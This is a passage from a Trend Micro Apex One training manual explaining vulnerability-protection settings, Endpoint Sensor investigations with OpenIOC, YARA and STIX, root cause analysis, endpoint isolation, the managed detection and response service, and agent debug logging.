two possible modes:
• Inline: In Inline mode, live packet streams pass directly through the Vulnerability Protection
network engine. All rules are applied to the network traffic before the packets proceed up the
protocol stack.
• Tap (Detect-only): In Tap mode, live packet streams are replicated and diverted from the main
stream. This mode is handy for evaluating the behavior of the rules as log entries will be
generated without applying the rule action.

This tab also includes enables the configuration of timeouts and other options.

• ESTABLISHED Timeout: How long to stay in the ESTABLISHED state before closing the
connection.
• LAST_ACK Timeout: How long to stay in the LAST-ACK state before closing the connection.
• Cold Start Timeout: Amount of time to allow non-SYN packets that could belong to a connection
that was established before the stateful mechanism was started.
• UDP Timeout: Maximum duration of a UDP connection.
• Maximum TCP Connections: Maximum simultaneous TCP Connections.
• Maximum UDP Connections: Maximum simultaneous UDP Connections.
• Ignore Status Code: This option lets you ignore certain types of Events. You can specify up to
three Events to ignore.
• Advanced Logging Policy: Select from the following settings:
- Bypass: No filtering of Events. Overrides the Ignore Status Code settings (above) and other
advanced settings, but does not override logging settings defined on the Apex One server.
- Default: Will switch to Tap Mode if the engine is in Tap Mode, and will switch to Normal if the
engine is in Inline Mode.
- Normal: All Events are logged except dropped retransmits.

© 2019 Trend Micro Inc. Education 321


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

- Backwards Compatibility Mode: For support use only.


- Verbose Mode: Same as Normal but including dropped retransmits.
- Stateful and Normalization Suppression: Ignores dropped retransmit, out of connection,
invalid flags, invalid sequence, invalid ack, unsolicited udp, unsolicited ICMP, out of allowed
policy.
- Stateful, Normalization, and Frag Suppression: Ignores everything that Stateful and
Normalization Suppression ignores as well as events related to fragmentation.
- Stateful, Frag, and Verifier Suppression: Ignores everything Stateful, Normalization, and
Frag Suppression ignores as well as verifier-related events.
- Tap Mode: Ignores dropped retransmit, out of connection, invalid flags, invalid sequence,
invalid ack, max ack retransmit, packet on closed connection.

322 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Lesson 18: Detecting and Investigating


Security Incidents on
Endpoint Computers

Lesson Objectives:

After completing this lesson, participants will be able to:


• Create policies using Endpoint Sensor
• Define the phases in the Incident Response Model
• Perform a preliminary assessment using Endpoint Sensor recorded data
• Generate a root cause analysis
• Respond to security incidents
• Perform a detailed investigation

Apex One includes tools for detecting and investigating suspicious activities on endpoint computers.
These capabilities allow threat investigators to explore detections and hunt for new threats using
Endpoint Detection and Response (EDR). Endpoint Detection and Response uses advanced detection and
response techniques integrated into the Security Agents on the endpoint computers to automate the
identification and containment of advanced threats.

In addition to Endpoint Detection and Response, Trend Micro has introduced a Managed Detection and
Response Service (MDR) , where trained analysts in a Trend Micro Security Operation Centers (SOC) can
assist organizations that don't have incident response staff to complete a detailed investigation of
threats and provide the steps needed to deal with these threats.

Trend Micro Endpoint Sensor plays a vital role in preventing, monitoring and containing the extent of
damage caused by targeted attacks on endpoints and servers.

Integrated Endpoint Sensor NEW

Trend Micro Endpoint Sensor identifies affected endpoints through on-demand investigations and
monitoring of threats, providing analysts with a comprehensive set of threat details that can help them
respond effectively to attacks. Endpoint Sensor plays an import role in the solution against advanced
persistent threats.

Separate Endpoint Sensor Agents and Servers are no longer needed to provide Endpoint Detection and
Response capabilities in Apex One. If the separate Agent is in use for an existing OfficeScan XG
installation, it will be automatically uninstalled when Apex One policies using Endpoint Sensor are
deployed and a new Apex One service will be launched to integrate Endpoint Sensor.

© 2019 Trend Micro Inc. Education 323


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Note: Endpoint Sensor is not supported on Windows Server platforms.

On the endpoint, the Apex One Security Agent records vectors commonly associated with targeted
attacks, such as file executions, memory violations, registry changes, and more in the form of metadata.
Endpoint Sensor utilizes the data during a preliminary investigation to identify affected endpoints. The
Agent creates a database of all the files, activities, and important system resources, and continuously
updates this database to record the arrival and execution of suspicious objects. This data is forwarded to
Apex One Server on a regular basis.

The type of metadata collected depends on the operating system installed on the endpoint.

Metadata collected from Windows endpoints include:


• Host (name / IP address)
• User account
• File name
• File path
• Hash values (SHA-1, SHA-256 and MD5)
• Registry key
• Registry data
• Registry name
• Command line

Metadata collected from macOS endpoints include:


• Host (name / IP address)
• User account
• File name
• File path
• Hash values (SHA-1, SHA-256 and MD5)
• Command line

Policies using Endpoint Sensor must be deployed through Apex Central. Endpoint Sensor capabilities are
built-in into the Apex One Server and Security Agent, however, an additional license is required to
activate them.

Trend Micro Endpoint Sensor provides the following capabilities to assist in the investigation and
mitigation of advanced threats:
• Threat Investigation: Endpoint Sensor provides a central location to investigate threats on
multiple endpoints. Endpoint Sensor can investigate both the historical and current state of all
managed endpoints. Each investigation can display a graphical breakdown of the threat
activities, which allows administrators to re-construct the events related to the security incident
from start to end.
If regular monitoring is part of the organization's security plan, Endpoint Sensor provides the
option to schedule investigations at specified intervals.

324 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

• Customized Endpoint Investigation: Endpoint Sensor supports Indicators of Compromise (IOC)


and YARA rules which allow the creation, sharing and re-use of existing threat information. IOC
and YARA rules are fully customizable to address targeted attacks. Additionally, Endpoint
Sensor also provides its own set of IOC rules, which are regularly updated to provide protection
from the most recent threats.
• Remote Endpoint Management: Endpoint Sensor allows administrators to monitor, manage and
run investigations on endpoints through the Apex Central Web-based management console. The
Web Management console provides a means to configure the endpoint policies remotely, and
view endpoint details, such as agent version, pattern version, and so forth, all from a central
location.
• Attack Discovery: Endpoint Sensor can proactively monitor and discover suspicious files and
behavior through user-defined IOC rules. Endpoint Sensor also leverages Trend Micro's threat
intelligence through the use of regularly updated IOC rules to provide protection from the latest
threats.
• File Collection and Analysis: Endpoint Sensor collects all files that match a monitoring rule. Once
a suspicious file is found, it can be sent to a local file server, or sent to a Deep Discovery
Analyzer device for further analysis. Deep Discovery Analyzer then provides Endpoint Sensor
with a comprehensive set of threat details that can help administrators determine if a file is
malicious or not.

Note: Endpoint Sensor requires the use of the full version of Microsoft SQL Server 2016 (not SQL
Express) with the Full-Text and Semantic Extractions for Search feature enabled.

Enabling Endpoint Sensor


When enabled, Endpoint Sensor monitors the endpoint computer and forwards metadata to the
Apex One server. Policies using Endpoint Sensor must be deployed from Apex Central.

© 2019 Trend Micro Inc. Education 325


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

In addition to enabling Endpoint Sensor, the option to enable Attack Discovery is available. Attack
Discovery uses Trend Micro threat intelligence based on Indicators of Attack behavior. After detecting
a known Indicator of Attack, Attack Discovery logs the detection.

Endpoint Detection and Response


Endpoint Detection and Response is a solution that allows administrators to continuously monitor
endpoints and record activities that could be considered suspicious. This centrally stored data can then
be searched for suspicious and malicious activities by a threat analyst.

The goals of the Endpoint Detection and Response system include:


• Detecting security incidents that may have been missed by other detection methods
• Containing the incident at the endpoint
• Providing guidance for further investigation of security events
• Providing remediation guidance

The key value of Endpoint Detection and Response solutions is detecting threats that have evaded other
protection technologies.

Endpoint Detection and Response assists the analyst in their investigation by providing three primary
functions:
• Recording and storing endpoint system-level behaviors. In Apex One, this function is provided by
Endpoint Sensor which in now integrated into the Security Agent.
• Detecting or flagging suspicious system behaviors from recorded data using various data
analytics techniques. In Apex One, this functionality is provided through Apex Central.
• Providing remediation suggestions to the analysts on how best to respond to the security
incident.

Based on the analysis of the collected data, the analyst can quickly answer some of the most common
questions when systems are breached, such as:
• What is the extent of the breach?
• How did the breach happen?
• What did the hacker or malware do while it was active?
• How do we confidently restore the system so that all traces of the malware are removed?
• Was this a random attack, was it targeted, and what were the attackers goals?
• How do we prevent it from happening again?

326 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Apex One Incident Response Model


The Apex One incident response model includes five distinct phases to deal with security incidents.
These phases include:
• Quick Health Check: This phase provides a Preliminary Assessment.
• Drill Down Events: This phases provides a Root Cause Analysis for the security incident.
• Stop the Bleed: This phase provides Incident Responses to prevent further infection.
• Dig Further: To better understand the impact of the security incident, this phase performs a live
Detailed Investigation of the endpoint. This phase does not rely on Endpoint Sensor recorded
metadata.
• Incident Auto-Detect: This phase provides Attack Discovery based on rules generated from
previously encountered incidents.

Quick
Health
Check

Incident Drill
Auto Down
Detect Events

Dig Stop
Further the
Bleed

Preliminary Assessment
A preliminary assessment is a quick search of objects that is run against historical metadata recorded by
Endpoint Sensor and stored on the Apex One Server. Since this task is not executed on the endpoints
themselves, it provides visibility of the whole environment, even when some endpoints are offline.

Preliminary assessments aim to shorten the waiting time while performing an investigation. The average
assessment scan takes between 5 to 10 seconds. The Apex One Security Agent can upload metadata to
the Apex One Server every 3, 6, 12 or 24 hours. Once uploaded, the Apex Central will perform a quick
scan against the Server database directly. The metadata retention period is based on the storage add-on
license purchased. By default, metadata is stored for 30 days, but a license for 90, 180 or 365 days can
be purchased.

Since preliminary assessment scans are performed against metadata, it does not provide a real-time
view of the endpoint. This is by design, as it provides a fast response to a query.

Preliminary assessments can be performed from a few different locations in Apex Central.

© 2019 Trend Micro Inc. Education 327


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Preliminary Investigation
In Apex Central, Click Response > Preliminary Investigation.

Preliminary investigations in Apex One will help administrators evaluate impact scope through
custom criteria defined by the administrator or OpenIOC.

Note: The data available during Preliminary investigations is a subset of Security Agent data and only
includes information about high risk file types. If an assessment returns no results, you may
want to perform a detailed investigation.

Custom criteria

An assessment using custom criteria can determine the existence of a threat using simple
criteria, such as user account, file name, registry values. An administrator can specify or load up
to ten user-defined criteria.

328 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

OpenIOC File

An OpenIOC file is an XML file which contains one or more Indicators of Compromise (IOCs).
Administrators can use OpenIOC rules to define investigation criteria. Preliminary investigations
disregard all conditions and match any of the indicators specified in the OpenIOC file. A
preliminary assessment can be performed when an analyst receives an indicator of compromise
which is compared against the metadata stored on the Apex One Server to see if the
environment is compromised.

OpenIOC files can be provided by Trend Micro through Apex Central (click Use Existing OpenIOC
File) or acquired from other sources and imported (Upload OpenIOC File).

© 2019 Trend Micro Inc. Education 329


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Select the OpenIOC file and click Apply.

Using OpenIOC files in preliminary investigations has the following limitations:


• Only one OpenIOC file can be loaded at a time.
• Any operator specified in the OpenIOC file is changed to OR.
• The only supported condition is IS. Entries using other conditions are ignored and marked
with a strikethrough.
• The only supported indicators are the indicators that are applicable to the collected
metadata. Entries using unsupported indicators are ignored and marked with a
strikethrough.

Custom Intelligence
Preliminary assessment can also be used to sweep the environment for objects that have not yet
been identified by Apex One as malicious. Suspicious objects defined in Custom Intelligence can be
used as the basis of the sweep. These objects can come from variety of sources. Security Agents can
be configured to automatically flag the defined objects when they enter the environment. Once the
types of objects have been defined by importing or adding the appropriate files, click Analyze
Impact.

330 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

In Apex Central, click Threat Intel > Custom Intelligence.

User-Defined Suspicious Objects

You can protect your network from objects not yet identified on your network by adding the
suspicious objects to the User-Defined Suspicious Object list. Apex Central provides the option
to add objects based on the file, file SHA-1, domain, IP address, or URL. You can also specify the
scan action that supported Trend Micro products perform after detecting the suspicious objects.

Click Threat Intel > Custom Intelligence and click the User-Defined Suspicious Objects tab.

Click Add to create your own custom list of user-defined suspicious objects, or click Import to
load a *.csv file containing the details.

© 2019 Trend Micro Inc. Education 331


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Click to select the User-Defined Suspicious Object from the list and click Analyze Impact.

It will take a few moments while the scan is performed.

332 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Structured Threat Information Expression

Structured Threat Information Expression (STIX) is a structured language for describing cyber
threat information so it can be shared, stored, and analyzed in a consistent manner.

After obtaining a properly formatted Structured Threat Information Expression (STIX) file
(*.xml) from a trusted external source (a security forum or other Deep Discovery Virtual
Analyzer product), import the file to Apex Central to extract the suspicious file SHA-1, IP address,
URL, and domain objects to the User-Defined Suspicious Object list. When uploading a file, you
can also specify the scan action that supported Trend Micro products perform after detecting
the suspicious objects.

Click Threat Intel > Custom Intelligence and click the STIX tab. Click Add to select the file to load.

Locate the STIX file and select the action to be performed on detected objects.

© 2019 Trend Micro Inc. Education 333


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

OpenIOC

You can protect your environment from objects not yet identified on your network by importing
properly formatted OpenIOC files (*.ioc) and extracting suspicious file SHA-1, IP address, URL,
and domain objects to the User-Defined Suspicious Object list. When uploading a file, you can
specify the scan action that supported Trend Micro products perform after detecting the
suspicious objects. After uploading an OpenIOC file, you can also select an uploaded file as the
assessment criteria for a Preliminary or Detailed Investigation.

Click Add to import an OpenIOC file, and select the scan action to perform on detected objects.

334 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Click to select the OpenIOC object from the list and click Analyze Impact.

Virtual Analyzer Suspicious Object


This assessment method leverages Suspicious Objects generated by Cloud Sandbox/Deep Discovery
Analyzer, but is limited to file hash, domain, destination IP address.

The Virtual Analyzer Suspicious Objects window allows an administrator to perform an impact
analysis on the network. The impact analysis uses Endpoint Sensor to contact Agents and performs
a historical scan of its logs to determine if the suspicious objects have affected your environment for
a period of time without detection.

© 2019 Trend Micro Inc. Education 335


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

In Apex Central, click Threat Intel > Virtual Analyzer Suspicious Objects. Click to select the desired
object and click Analyze Impact.

Root Cause Analysis


Root Cause Analysis is the graphical representation of how the infection and/or suspicious activities
occurred. This is very helpful in tracking down the root cause of the problem, identifying patient zero or
the entry point.

If an assessment returns a match, administrators may generate a root cause analysis to:
• List all related objects to the specified criteria
• Identify if any of the related objects are noteworthy
• Review the sequence of events leading to the execution of the matched object.

Root Cause Analysis provides a forensic picture from the endpoint side of the attack to track down the
root cause of infection and related suspicious/malicious activities. Root Cause Analysis tasks are created
on Apex One Server as an investigation batch. Endpoints poll the Apex One Server every ten minutes for
updates and to collect the batch of investigation tasks. Root Cause Analysis needs one to five minutes to
complete and to upload the results.

Note: Root Cause Analysis is not supported for Mac Security Agents.

336 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

To manually generate the Root Cause Analysis, click Response > Preliminary Investigation > Assessment.
Select the required endpoints and click Generate Root Cause Analysis.

Provide a name for the Root Cause Analysis report.

© 2019 Trend Micro Inc. Education 337


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

The Root Cause Analysis report will display as processing while the analysis takes place.

In Apex Central, click Response > Preliminary Investigation > Root Cause Analysis Results to view the
results of all automated and manual Root Cause Analysis tasks.

Click the Task Name to view the results of the analysis. The Analysis Chains tab displays the main Root
Cause Analysis information in a graph view.

338 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Details on the graph include:


• Target Endpoint: Displays information of the root cause analysis result, and the ability to
isolate the endpoint.
• First Observed Object: With built-in intelligence, Endpoint Sensor is able to find the potential
entry point of the root cause chain.
• Matched Objects: Lists all the objects which matched with input criteria.
• Noteworthy Objects: Objects identified as suspicious or malicious will be displayed.

Icons and dots represents each component and their relationship. More information is available for
each object by clicking on it (user, pid, hashes…). The root cause analysis area shows object types
using the following icons:

Icon Name Description


Marks an object that most likely created the matched
First Observed Object
object

Matched Criteria Marks objects matching the investigation criteria

Marks objects that have been verified to not pose a


Normal Object
threat, such as common system files (icon in black)
Marks objects that are not system files but do not
Unrated Object
exhibit suspicious behavior (icon in grey)
Marks objects that exhibit behaviors that are similar to
Suspicious Object
known threats (icon in orange)

Malicious Object Marks objects that match a known threat (icon in red)

Boot Objects that launch during system startup

Objects that are capable of displaying web pages,


Browser
usually a web browser

Email Objects that can send and receive email messages,


usually an email client or server

File name Objects that are files on the disk

Network Objects related to network connections or the Internet

Objects that are processes running during the time of


Process
execution

Registry Objects that are registry keys, entries or data

Event Indicates actions done by the object

Association Indicates relationships between two objects

If a process object is not normal, it can be terminated. If a process life was too short and the hash
couldn’t be calculated, termination won’t be possible.

© 2019 Trend Micro Inc. Education 339


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

The Objects Details tab displays same information as Analysis Chains, but in tabular format.

If an object is not normal, the file name/file hash/domain/IP/registry info can be used as Preliminary
Investigation (Impact Assessment) and File hash/domain/IP can be added as Suspicious Objects.

Both Analysis Chains and Object Details can be exported to *.png or *.csv formats.

Incident Response
The incident response phase allows administrators to mitigate damage from infected endpoints, by
terminating suspicious processes, banning suspicious applications through User Defined Suspicious
Objects or isolating endpoints.

Terminating Suspicious Processes


When you click a process object in the Analysis Chain and its rating is not normal, you can terminate
it remotely. After a certain time, the process will be terminated on the endpoint. Click the process
object in the Analysis Chain graph and click Terminate Object.

340 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Adding Processes to the Suspicious Objects List


A process will not be able to execute/access again if it has been added to User Defined Suspicious
Objects. The running process will be terminated as well. Click the process object in the Analysis
Chain graph and click Add to Suspicious Object List

Apex One Application Control should be enabled for blocking SHA-1 at endpoint.

Isolating Endpoints
From the Historical Investigation results, one or more endpoint can be isolated from the network
based on Windows Filtering Platform feature. All communication from/to this endpoint would be
blocked except between the Apex One Server and Security Agent. Click Response > Historical
Investigation. On the Assessment tab, select the endpoint in question and click Isolate Endpoint.

© 2019 Trend Micro Inc. Education 341


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

When the crisis is resolved, restore endpoint connectivity. Click Directories > Users/Endpoints. In the
Endpoints list, click All.

Click the isolated endpoint and click Restore from the Task column.

Isolate Endpoint  can be selected from the Root Cause Analysis result window, Detailed Investigation
results and Endpoint view.

Detailed Investigation
Detailed (also referred to as Real-Time or Live) Investigation is the search process that deals with the
current system state. It scans memory and the disk with specific indicators or examines running process.
Detailed Investigation is currently not supported on Mac endpoints.

Detailed Investigation methods available include:


• Search memory using YARA files
• Search the hard disk using OpenIOC files
• Search the Windows Registry with custom criteria

Note: Preliminary Assessment is not run live, but runs on metadata submitted to the Apex One Server.
This provides a fast search and works even if endpoint is offline. Detailed Investigation runs on
the endpoint in real time.

342 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Root cause analysis results are only available for YARA rules. Because detailed investigations run on the
current system state, some files and registry entries may be locked or in use during this period. Root
Cause Analysis results are not available for investigations using OpenIOC rules or registry search. To
generate a root cause analysis using OpenIOC rules or registry data, use preliminary investigation.

A Detailed Investigation can be run once or can be scheduled to run regularly using a set of similar
settings. The average Detailed Investigation run time is about 40 min (Security Agent polling occurs
every 10 minutes, the Detailed Investigation task and data upload takes about 20 to 30 minutes). The
Polling interval can be reduces from Apex One Server by clicking Agents > Global Agent Settings > Server
Polling Interval.

To begin a Detailed Investigation, click Response > Detailed Investigation.

Click either the One-Time Investigation or Schedule Investigation tabs and click New Investigation. Type
a Name, select a Method and click Select Endpoints to identify the endpoint on which to run the
investigation.

© 2019 Trend Micro Inc. Education 343


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Scan Disk Using OpenIOC

This option will scan files on the hard disk using OpenIOC 1.0 rules or repository rules to scan for
all files currently on the disk. Click Upload OpenIOC file to import an OpenIOC file acquired from
another source, or click Use Existing OpenIOC file to use a file provided by Trend Micro. Click
Select Endpoint to identify the endpoints on which the investigation will be run.

Only one OpenIOC file can be used by the task and all conditions within OpenIOC file will be
handled as OR (any of the criteria).

344 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Click Start Investigation. A progress bar is displayed as the investigation proceeds.

The following indicators of compromise items and conditions are supported for Detailed
Investigations.

Is Contains Starts-with End-with Greater-than Less-than


fileitem/filepath √ √ √ √
fileitem/fullpath √
fileitem/filename √ √ √ √
fileitem/md5sum √
fileitem/sha1sum √
fileitem/sha256sum √
fileitem/sizeinbytes √ √ √
fileitem/created √ √
fileitem/modified √ √
fileitem/accessed √ √

Certain limitations exist for Scan disk files using IOC, including:
• A hash is not generated for file larger than 64 MB
• Large files can’t be check by hash with OpenIOC
• Time format must be in the following UTC format yyyy-mm-ddThh:mm:ss to check on
Fileitem/Created-modified-accessed.
• Apex One can only use a maximum of 100 indicator items, and max 50 for depth
• Search runs upon 10k files as limit
• Searches must be specific (directory as example)
• Search returns a maximum of 1000 items matched
• Search is not related to number of endpoints
• Unsupported items and conditions won’t be used for the investigation task, and will be
shown as strikethrough.

© 2019 Trend Micro Inc. Education 345


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

All endpoints that matched the OpenIOC file will appear on the Matched  tab.

Click the item for further details.

346 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Scan In-Memory Processes Using YARA Rules

This option uses YARA rules to scan all processes currently running in memory. YARA rules
allows a scan on running processes that contains strings that are identified. This can be used in
situation where hash values can not be used as a criteria for investigation.

YARA rule files can be imported or selected from the repository. Only one YARA file can be used
per task.

YARA rules are the only Detailed Investigation method that provides Root Cause Analysis data.
Because Detailed Investigations run on the current system state, some files and registry entries
may be locked or in use during this period.

© 2019 Trend Micro Inc. Education 347


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

All endpoints that match the YARA Rule file will appear on the Matched tab.

Click View in the Root Cause Analysis column to view the Analysis Chain graph.

348 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Search Registry

This method uses manually defined settings to search the Windows Registry for the system
current state. Define criteria with key (path), (key) name and value. Multiple items can be set and
will be handled as an OR operation

Registry root key available for live scanning include:


• HKEY_CURRENT_USER
• HKEY_CLASSES_ROOT
• HKEY_LOCAL_MACHINE
• HKEY_USERS

Note: HKEY_CURRENT_CONFIG root key can’t be scanned

All endpoints that match the Registry criteria will appear on the Matched tab.

© 2019 Trend Micro Inc. Education 349


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Viewing Detailed Investigation Results

Investigation results are displayed in the Detailed Investigation windows. Previous results are
retained for the time period allowed by the software license. Tasks can be stopped (under
processing) or deleted.

Attack Discovery
Attack Discovery uses an Indicator of Attack-based detection engine. This mechanism focuses on the
detection of the intent of what an attacker is trying to accomplish, regardless of the malware or exploit
used in an attack.

Attack Discovery behavior is based on the given Attack Discovery Engine (ADE) rules. The Attack
Discovery Engine detection log could be a starting point of the investigation.

Viewing the Attack Discovery Engine Log


In Apex Central, click Detections > Logs > Log Query. Select Attack Discovery Detections from the
list.

350 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Managed Detection and Response


Despite putting sophisticated threat detection techniques in place, there are still some advanced
targeted attacks that can bypass traditional defenses.

Some of the approaches used to detect these advanced threats include:


• Network Discovery: Products like Deep Discovery Inspector are available to monitor the network
on multiple protocols looking for Command & Control behavior and detecting lateral movement
of threats. These tools also incorporate virtual sandboxing technology for definitive
identification of advanced threats.
Network Discovery tools can sometimes be very complex to work with, and can generate a large
number of alerts which could require investigation. Also, network tools can't identify threats at
the point of entry.
• Endpoint Detection and Response: Detailed system activity can be recorded on the endpoint and
threat investigators can query the endpoint searching for Indicators of Attack (IOA) or Indicators
of Compromise (IOC). Advanced detection techniques implemented on the endpoint computer
such as behavior analysis and predictive machine learning can identify emerging or unknown
threats.

These approaches require well trained researchers with strong skills to deconstruct the attack and
identify the correct indicators of attack. This investigation process can be very complex, time consuming
and expensive. A large number of alerts detected on the network and endpoint can lead to alert fatigue
and important details can be overlooked in the rush to investigate every activity that is occurring. The
number of endpoints that need to be dealt with, including servers, endpoint computer and IoT devices
further complicates the process. Once the threats have been identified, a mitigation plan must be
devised and implement to protect the environment from any further attack. And finally, a skill shortage
in the industry can make it difficult for organizations to recruit researchers with the appropriate skill set.

All of this drives the need for a managed detection and response solution.

Trend Micro Managed Detection and Response Service


Trend Micro has introduced a new line of attack to deal with advanced threat detection and
mitigation through its Managed Detection and Response Service.

Advanced automation mechanisms available though Trend Micro's Security Operation Centers (SOC)
can assist in correlating all alerts coming into our customers systems and prioritizing them.
Advanced Artificial Intelligence (AI) techniques can help reduce the number of manual investigations
required to develop an appropriate mitigation scheme.

© 2019 Trend Micro Inc. Education 351


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Once the prioritized list of alerts has been compiled, Trend Micro staff in the Security Operation
Centers will be able to assist organizations that don't have incident response staff to complete a
detailed investigation of threat and provide the steps needed to deal with the threat.

Detecon Analysis Response


• Automated priorizaon • SOC personnel invesgate • Alert and advise
• Automac sweeping • Validate alerts • Root cause analysis
• Threat hunng • Detailed threat analysis • Migaon
and impact recommendaons or
toolkits

The Trend Micro Managed Detection and Response Service includes three components:
• Detection: Since the Security Operation Center has the ability to correlate threats and events
occurring on the network with threats occurring on the endpoint, they can get a better view into
the advanced threats penetrating the organization and improve the detection of these threats.
In addition, if Trend Micro obtains Indicator of Compromise information from a detected threat
on another customer or from a third party, Trend Micro can sweep across all of the customer's
device as well as all other Managed Detection and Response Service customers to insure that
none of the indicators are in place.
• Analysis: Trend Micro Security Operation Center personnel will investigate and perform a deep
dive to validate alerts, build a detailed threat analysis and create an impact report including a
root cause analysis to identify how threats got into the network, where they first manifested
themselves, how the threats may have changed over time, how it spread through the network
and to how many users many be affected.
• Response: Security analysts in the Security Operation Center generate a report based on the
root cause analysis, and provide a mitigation plan which includes recommendations on how to
clean the affected devices, and in some cases, provide the damage cleanup tools that can assist
in the process.

352 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Service Components
The Trend Micro Managed Detection and Response Service is made up of three components.

Threat Invesgaon Centre


Sensors Response

Threat Expert Machine


• Integrated Endpoint intelligence rules learning • Delivered to Apex Central
Protecon Web Management
• Deep Discovery Inspector console
• Deep Security

Trend Micro Analysts

• Sensors: Customers put the appropriate sensors in place to record system behavior and
activities and forward metadata about these activities to the service. On the endpoint
computer, Trend Micro Endpoint Sensor and Apex One will be used. Deep Discovery
Inspector on the network will record similar metadata and send it to the service, and Deep
Security will do the same for servers.
• Threat Investigation Center: The Threat Investigation Center at a centralized-managed
Trend Micro Security Operation Center will take advantage of Trend Micro threat
intelligence information, rules, machine learning, and artificial intelligence to correlate what
is happening on an endpoint with what is happening on the network to identify prioritized
alert situations.
• Response: Trend Micro analysts examine the alert details, perform a deep investigation and
provide a response directly to Apex Central with the full plan to mitigate against the attack.

Managed Detection and Response Service Flow


As an example, a user downloads an infected file that was able to take over a remote PC through a
Powershell script and compromise an IoT device.

Protection on the Endpoint identifies that this end user has been compromised. At the same time,
Deep Discovery Inspector identifies Command & Control behavior. Taking these two events together,
if the infected PC attempts to access that C&C server, a correlation can be established and a bigger
picture around the advanced attack can be drawn.

Advanced detection techniques identify the relationship between the alerts and prioritize that this is
something worth investigating. An Alert can be forwarded to the end user asking for approval to
proceed with the investigation and the analysts performs an impact analysis.

The Trend Micro analysts identify the threat, identify the risk and impact, identify if anything else
was downloaded and determine whether that target has been breached. The analyst proceeds with a
root cause analysis that allows them to understand the story of the attack and develop a plan to
mitigate it.

© 2019 Trend Micro Inc. Education 353


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

A report is compiled to provide all the information about attack, recommendations on how to
mitigate the threat and in some cases, which tools can be provided to deal with its remediation.

The end customer is then responsible for the threat remediation which can include killing certain
processed, re-imaging the endpoint, or implementing a pattern update.

The Threat Investigation Center will then build an Indicator of Compromise that will allow them to
easily repeat the identification of the threat and continually monitor for same type of attack in the
same customer's environment and on other Managed Detection and Response Service customers.

Customers are provided with a full report on each incident that are detail response and remediation
to the threat. Monthly and quarterly report are also provided to the organization's management to
re-inform the value provided through the service and provide specific actions and recommendations
to improve their security posture

Managed Detection and Response Service focuses on Detection, Analysis and Response; the
customer or partner is responsible for Remediation.

Compromise Detection Analysis Respond Remediate

Managed Detection and Response Service

Configuring Apex Central for Managed Detection and Response


Service
When a customer subscribes to the Managed Detection and Response service from Trend Micro, the
details of the Threat Investigation Centre and the organization’s unique ID must be provided.
1 Open the Apex Central Web Management console, and click Response > Managed Detection and
Response.

354 © 2019 Trend Micro Inc. Education


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

2 Click the Settings tab and complete the details:

• Server address: Type the HTTPS log server address of Threat Investigation Center, as
provided by Trend Micro
• Company GUID: Type your unique company ID, as provided by Trend Micro
• Task approval: enable this setting to allow the Trend Micro Threat Investigation Center to
initiate investigations without requiring approval from the customer
• Notification recipients: If automatic approval for investigations is not enabled, identify the
users or groups to be queried for approval to allow the Trend Micro Threat Investigation
Center to proceed with the investigation
Click Register.

Note: Apex Central sends detections to the Threat Investigation Center every 5 minutes.

© 2019 Trend Micro Inc. Education 355


Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

356 © 2019 Trend Micro Inc. Education


Appendix A: Troubleshooting Trend Micro Apex One

Appendix A: Troubleshooting Trend Micro


Apex One
This Appendix details some tips and methods for troubleshooting various Apex One components .

Debugging Security Agents


Enabling debug functions on the Security Agent allows an administrator to analyze many aspects of an
Agent’s operation. To enable debug logging on an Security Agent, perform the following steps:
1 Create and save a file called ofcdebug.ini in the Security Agent folder with the following
entries:

[debug]

DebugLevel=9 ← Level 1 (less detailed) to 9 (most detailed)

DebugLog=<name and file path for the debug log>

debugLevel_new=D

debugSplitSize=104857600

debugSplitPeriod=24

debugRemoveAfterSplit=1

Note: The debugLevel_new, debugSplitSize, debugSplitPeriod, and


debugRemoveAfterSplit entries instruct Apex One to split the debug files into smaller files.

2 Locate and double-click Logserver.exe in the Agent folder. This will start the debug logging.
3 After running for a period of time, open the log file to view details.
4 Close Logserver.exe and delete ofcdebug.ini to disable debugging.

